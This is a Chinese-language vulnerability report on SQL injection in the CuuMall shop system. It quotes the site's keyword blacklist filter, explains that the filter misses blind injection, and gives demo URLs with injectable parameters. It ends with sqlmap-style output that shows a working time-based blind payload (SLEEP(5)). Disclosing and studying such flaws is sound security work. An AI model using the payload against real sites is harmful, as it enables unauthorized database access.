### 简要描述: CuuMall商城系统设计缺陷整站注射 ### 详细说明: http://demo.cuumall.com/index.php/home/detail/index?id=323 http://demo.cuumall.com/index.php/home/new/cxview/id/7 系统sql注入过滤: ``` public function inject_checksql( ) { $bad_str = "select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile|mid|script"; $bad_Array = explode( "|", $bad_str ); foreach ( $bad_Array as $bad_a ) { foreach ( $_GET as $g ) { if ( 0 < substr_count( strtolower( $g ), $bad_a ) ) { $this->assign( "waitSecond", 3 ); $this->assign( "msgTitle", "非法注入" ); $this->assign( "jumpUrl", "__APP__" ); $this->error( "请不要进行非法注入" ); exit( ); break; } } } foreach ( $bad_Array as $bad_a ) { foreach ( $_POST as $p ) { if ( 0 < substr_count( strtolower( $p ), $bad_a ) ) { $this->assign( "waitSecond", 3 ); $this->assign( "msgTitle", "非法注入" ); $this->assign( "jumpUrl", "__APP__" ); $this->error( "请不要进行非法注入" ); exit( ); break; } } } foreach ( $bad_Array as $bad_a ) { foreach ( $_COOKIE as $co ) { if ( 0 < substr_count( strtolower(...
### 简要描述: CuuMall商城系统设计缺陷整站注射 ### 详细说明: http://demo.cuumall.com/index.php/home/detail/index?id=323 http://demo.cuumall.com/index.php/home/new/cxview/id/7 系统sql注入过滤: ``` public function inject_checksql( ) { $bad_str = "select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile|mid|script"; $bad_Array = explode( "|", $bad_str ); foreach ( $bad_Array as $bad_a ) { foreach ( $_GET as $g ) { if ( 0 < substr_count( strtolower( $g ), $bad_a ) ) { $this->assign( "waitSecond", 3 ); $this->assign( "msgTitle", "非法注入" ); $this->assign( "jumpUrl", "__APP__" ); $this->error( "请不要进行非法注入" ); exit( ); break; } } } foreach ( $bad_Array as $bad_a ) { foreach ( $_POST as $p ) { if ( 0 < substr_count( strtolower( $p ), $bad_a ) ) { $this->assign( "waitSecond", 3 ); $this->assign( "msgTitle", "非法注入" ); $this->assign( "jumpUrl", "__APP__" ); $this->error( "请不要进行非法注入" ); exit( ); break; } } } foreach ( $bad_Array as $bad_a ) { foreach ( $_COOKIE as $co ) { if ( 0 < substr_count( strtolower( $co ), $bad_a ) ) { $this->assign( "waitSecond", 3 ); $this->assign( "msgTitle", "非法注入" ); $this->assign( "jumpUrl", "__APP__" ); $this->error( "请不要进行非法注入" ); exit( ); break; } } } } ``` 明显忽略了盲注。。。。 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201410/14163749fc7da7f461350793ec9e496ff20909e0.jpg" alt="Capture.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/14163749fc7da7f461350793ec9e496ff20909e0.jpg) [<img src="https://images.seebug.org/upload/201410/141638181922eca1d4c7f439f8c53f4aca7ed2b8.jpg" alt="Capture.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/141638181922eca1d4c7f439f8c53f4aca7ed2b8.jpg) ``` Place: GET Parameter: id Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=10 AND SLEEP(5) --- web server operating system: Windows web application technology: Apache 2.0.63, PHP 5.2.14 back-end DBMS: MySQL 5.0.11 ```
